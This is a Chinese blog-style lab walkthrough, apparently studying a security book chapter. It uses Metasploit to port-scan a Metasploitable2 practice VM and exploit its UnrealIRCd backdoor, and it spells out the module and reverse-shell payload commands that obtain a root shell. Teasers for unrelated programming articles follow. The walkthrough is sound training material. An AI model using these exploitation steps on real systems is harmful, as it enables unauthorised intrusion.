第10章 metasploit(网络安全防御实战--蓝军武器库)

devtools/2025/3/10 18:31:47/

网络安全防御实战--蓝军武器库是2020年出版的,已经过去3年时间了,最近利用闲暇时间,抓紧吸收,总的来说,第10章开始学习利用metasploit渗透测试工具去打metasploit2虚拟机,本文我演示了metasploit端口扫描和漏洞利用,更多有趣的渗透测试实验,有待大家挖掘~

  • ailx10:metasploit渗透测试入门
  • ailx10:使用metasploit获取域散列值
  • ailx10:Meterpreter渗透测试入门

ailx10

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

1、启动metasploitable2虚拟机,拿到IP地址(192.168.85.171)

2、访问web页面,里面有很多白帽子黑客练习的靶场

3、使用root 身份 运行 kali 的 msfconsole ,对metasploitable2进行syn端口扫描

search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.85.171

4、查看syn端口扫描结果,体验很慢,不如 nmap

5、漏洞利用,直接帮忙提权到root了,成功获得metasploitable2 后门

use exploit/unix/irc/unreal_ircd_3281_backdoorset RHOSTS 192.168.85.171
set payload generic/shell_reverse_tcp
set payload cmd/unix/reverse
set lhost 192.168.85.23
run

编辑于 2023-03-24 21:47・IP 属地江苏


http://www.ppmy.cn/devtools/166075.html

相关文章

自学微信小程序的第十三天

DAY13 1、使用map组件在页面中创建地图后,若想在JS文件中对地图进行控制,需要通过地图API来完成。先通过wx.createMapContext()方法创建MapContext(Map上下文)实例,然后通过该实例的相关方法来操作map组件。 const m…

P8692 [蓝桥杯 2019 国 C] 数正方形--输出取模余数

P8692 [蓝桥杯 2019 国 C] 数正方形 题目 解析代码 题目 解析 这是数学题 T^T 不过对于这种题目都说了结果非常大的题,得开long long【不开long long 见ZZ】 然后还有点要说的就是,为了缩减计算量,这种要求结果输出模后余数的题&#xff0…

7.自然语言处理(NLP)理论基础——大模型微调的基石

文章目录 一、引言二、基本概念2.1 词嵌入2.2 预训练与微调2.3 Prompt Engineering 三、核心技术3.1 语言模型构建3.2 位置编码3.3 长文本处理 四、工具介绍 一、引言 在当前人工智能的浪潮中,自然语言处理(NLP)正以其出色的语义理解和生成能…

PCIe协议之RCB、MPS、MRRS详解

✨前言: PCIe总线的存储器写请求、存储器读完成等TLP中含有数据负载,即Data Payload。Data Payload的长度和MPS(Max Payload Size)、MRRS(Max Read Request Size)和RCB(Read Completion Bounda…

【VUE】day01-vue基本使用、调试工具、指令与过滤器

【VUE】day01-vue基本使用、调试工具、指令与过滤器 1. 什么是Vue2. Vue的基本使用 1. 什么是Vue Vue(Vue.js)是一个用于构建用户界面的渐进式 JavaScript 框架,其核心设计理念是“自底向上逐层应用”,既能作为轻量级库增强现有项…

linux | Vim 命令快捷操作

注:本文为过去的 “vim 使用笔记”。 跳转命令 跳转命令 #:向前查找光标当前所在单词,并跳转到该单词的上一个出现位置。*:向后查找光标当前所在单词,并跳转到该单词的下一个出现位置。 行内跳转 0:跳转…

在uni-app中使用SQLite实现离线下数据同步:从封装到实践

场景: 在移动应用开发中,确保应用在无网络连接时仍能正常运行并进行数据同步至关重要。 对于uni-app开发者而言,SQLite是理想的本地存储解决方案,支持结构化数据的存储和检索。本文将介绍如何在uni-app项目中使用SQLite实现离线…

Spring Boot 项目中慢SQL优化方案

Spring Boot 项目中慢 SQL 优化是一个重要的性能优化环节。以下是一些常用的慢 SQL 优化方案,涵盖了从 SQL 语句本身到数据库配置、应用层优化的多个方面: 1. 识别慢 SQL: 慢查询日志 (Slow Query Log): MySQL、PostgreSQL 等数据库都提供了…